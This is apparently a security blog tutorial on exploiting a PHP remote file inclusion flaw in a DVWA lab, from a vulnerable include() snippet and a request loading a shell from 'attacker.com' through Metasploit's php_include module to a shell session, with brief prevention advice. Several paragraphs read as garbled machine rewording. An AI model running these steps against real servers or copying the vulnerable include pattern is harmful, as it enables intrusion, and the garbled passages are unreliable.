From RFI(Remote File Inclusion) to Meterpreter Shell

For many years now we’ve participated in many coding forums and discussion platforms. Perhaps one of the biggest issues we see is people using $_GET or another unfiltered variable inside of an include, include_once, require or require_once statement which is a major security risk.

One of the most dangerous types of vulnerabilities we can find while penetration testing is Remote File Inclusion (RFI). RFI gives us the ability to execute code on the Web server in the context of the user running the Web server. With this, we can generate shells, include other code, and, through post-exploitation, potentially elevate privileges. This type of exploit frequently leads to the compromise of other resources, as the Web server is then leveraged to attack other hosts.

Let’s look more closely at what RFI is, how it happens, and how we can make a vulnerable application bend to our will.

Remote file inclusion attacks happen when an attacker pulls records from a remote area on to your server. When you utilize remote incorporates, an aggressor can compose a PHP script and host it on a server. After that utilization is a remote consideration strategy to exploit incorporation vulnerabilities on your server.

With a shaky PHP design, assailants can execute the noxious information from their servers, even without read or compose consents on your server.

In PHP applications, there are typically two problems that lead to RFI vulnerabilities. The first is a logic error in the application. Usually, these vulnerabilities are due to files that are expected to be included as part of another page that includes other files. When these files are executed independently, there is no configuration file to specify the default values for those variables, and if the Web server is configured improperly, the user may be able to specify them as part of the request.

Example: A PHP Program that is powerless against Remote File Inclusion (RFI)

<?php
$file = $_GET[‘file’];
include($file);
?>

In the above code, the “file” parameter is taken from the request, and it is a user supplied value. The code takes in the “file” value and directly includes it in the PHP file through which an attacker could make the accompanying solicitation to trap the application into executing a malicious script, for example, a webshell like this way http://example.com/?file=http://attacker.com/shell.php.

Exploiting RFI requires that you have a PHP shell uploaded somewhere and accessible from the internet. In this article, we will be exploiting an RFI vulnerability to get a command shell on the target system i.e. on Metasploitable2 machine.

Back on attacker machine, i.e. Kali Linux whose IP address is 192.168.73.128 (in our case), where you need to make one testing php file (e.g. yeahhub.php) under /var/www/html directory and restart the apache server as shown below.

In order to check if an RFI vulnerability exists, we can simply ask the web application in question to retrieve the file we created in above step.

Go to the “File Inclusion” page in DVWA, and replace the page being requested with the path of our test file i.e. yeahhub.php being hosted on Kali machine (http://192.168.73.128/yeahhub.php).

When the page loads, we can see the text (YEAHHUB.COM is Here) from our php file, indicating that this page is indeed vulnerable to RFI vulnerability.

[#2] Exploitation with Metasploit Framework –

Before to start the exploitation process, make sure that you must note down all cookie values i.e. PHPSESSID and security value so that we can pass it inside the metasploit module.

In this case, the PHPSESSID value is bb68ea00e0a624f159c5ea12ad0a1176 and security value is low.

Metasploit has the ability to exploit RFI vulnerabilities as well, and with Metasploit we get the power of the Metasploit payloads. The PHP Meterpreter shell will allow us to route traffic, execute shell commands, and execute Meterpreter scripts under the context of the Web server.

To use the php_include exploit module, we launch msfconsole and type “use exploit/unix/webapp/php_include“.

The php_include module is very versatile as it can be used against any number of vulnerable webapps and is not product-specific. In order to make use of the file inclusion exploit module, we will need to know the exact path to the vulnerable site which you can see all the required options by typing “show options” command.

The most critical option to set in this particular module is the exact path to the vulnerable inclusion point where we would normally provide the URL to our PHP shell, we simply need to place the text XXpathXX and Metasploit will know to attack this particular point on the site.

In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload and to see all available payloads, the command is “show payloads“.

To set the PHP payload, the command is “set payload php/bind_php“.

Type run to launch the exploit which immediately opens a shell session where you can execute n number of unix commands as shown below:

[#3] Prevention of RFI –

To prevent possible exploitation of the remote file inclusions vulnerability you should always disable the remote inclusion feature in your programming languages configuration, especially if you do not need it.

Along with, you also need to edit the value of allow_url_include to 0. You should also validate user input before you pass it to an inclusion function.

Have something to say about this article? Comment below or share it with us on Facebook or Twitter.

Related Articles

Unvalidated data Never trust anything you get from a Web browser. The browser is completely outside of your control, and it’s easy to fake values like the HTTP referrer. It’s also easy to fake a hidden field in a form. More importantly, when dealing with forms, for example, validate the data carefully. Use a “deny all, […]

Question: What is a shell when it comes to web hacking? Answer: Well, basically a shell is an interface between client and server and comes up with an extension of .php. To make it works, hackers always uploaded this kind of PHP Shell into online web servers in order to make it work. When you […]

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server. [#1] Exploitation using […]

Disclaimer

Yeahhub.com does not represent or endorse the accuracy or reliability of any information’s, content or advertisements contained on, distributed through, or linked, downloaded or accessed from any of the services contained on this website, nor the quality of any products, information’s or any other material displayed,purchased, or obtained by you as a result of an advertisement or any other information’s or offer in or in connection with the services herein.